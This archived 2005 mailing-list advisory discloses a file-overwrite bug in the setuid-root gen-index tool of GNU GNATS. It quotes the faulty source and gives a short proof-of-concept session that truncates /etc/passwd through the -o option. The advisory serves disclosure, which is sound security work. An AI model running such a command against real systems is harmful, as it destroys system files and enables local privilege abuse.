lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <42cbf3db8829f@wp.pl> Date: Wed Jul 6 16:08:34 2005 From: pi3ki31ny at wp.pl (Adam Zabrocki) Subject: GNATS - gen-index Name: GNATS - gen-index Vendor URL: http://www.gnu.org/software/gnats Author: Adam Zabrocki <pi3ki31ny@...pl> Date: June 16, 2005 Issue: GNATS - the GNU problem report management system allows attacker to overwrite files with privileges suid root (when compiled from sources and there isn't in system gnats user), where GNATS is installed. Description: GNATS stores all information about the problem reports at a central site, and enables users to access this site by various means, including e-mail, WWW, and a network daemon. New problem reports can be created, and existing reports can be queried and updated, by most of these means. Details: Possible overwrite any files in system by gen-index program installed with GNATS. Local users, able to run gen-index (in some times when GNATS was compiled from sources and in system don't exist gnats user and group) are able to overwrite any files in system. The problem lies in gen-index main() function, which don't check argument who was given to program and in hard open and write there own data. "gnats/gen-index.c" int main (int argc, char **argv) { ... ... while ((optc = getopt_long (argc, argv, "o:hd:nVie", long_options, (int *) 0)) != EOF) { switch (optc) { ... ... case 'o': file_name = optarg; break; case 'n': numeric_sorting = TRUE; break; ... ... } } ... ... if (file_name) output = fopen (file_name, "w+"); if (output == (FILE *) NULL) { fprintf (stderr, "%s: can't write to %s: %s\n", program_name, optarg, strerror (errno)); exit (3); } ... ... if (indexIsBinary (database)) { char numFields = indexFieldCount (database); fwrite (&numFields, 1, 1, output); } ... ... if (numeric_sorting && num_entries > 0) { qsort (entries, num_entries, sizeof (Entry), entry_cmp); for (i = 0; i < num_entries; i++) { fwrite (entries[i].string, 1, entries[i].length, output); } } fclose (output); ... exit (0); } Function fopen() with argument "w+" open file for reading and writing. The file is created if it does not exist, otherwise it is truncated. So when gen-index have suid root privilages we can overwrite any files in system. Exploit: We don't need to write any 31337 exploit. Simple PoC: pi3@...kstar:~$ pwd /home/pi3 pi3@...kstar:~$ ls -alh /etc/passwd -rw-r--r-- 1 root root 795 May 19 18:49 /etc/passwd pi3@...kstar:~$ ls -alh /usr/local/libexec/gnats/gen-index -r-sr-xr-x 1 root root 465k Nov 21 2004 /usr/local/libexec/gnats/gen-index* pi3@...kstar:~$ /usr/local/libexec/gnats/gen-index -n - o /etc/passwd pi3@...kstar:~$ ls -alh /etc/passwd -rw-r--r-- 1 root root 1 Jun 16 17:34 /etc/passwd pi3@...kstar:~$ cat /etc/passwd pi3@...kstar:~$ GNATS 4.1.0 and 4.0 are confirmed vulnerable. Probably all previous versions are also vulnerable. I have informed GNATS team. -- pi3 (pi3ki31ny) - pi3ki31ny@...pl http://www.pi3.int.pl ---------------------------------------------------- Uroda.wp.pl - Nowy, kobiecy serwis internetowy! - Teraz zawsze pod r?k?. W lipcu Joanna Brodzik - poznaj jej sekrety: Kliknij: http://klik.wp.pl/?adr=www.uroda.wp.pl&sid=424
Powered by blists - more mailing lists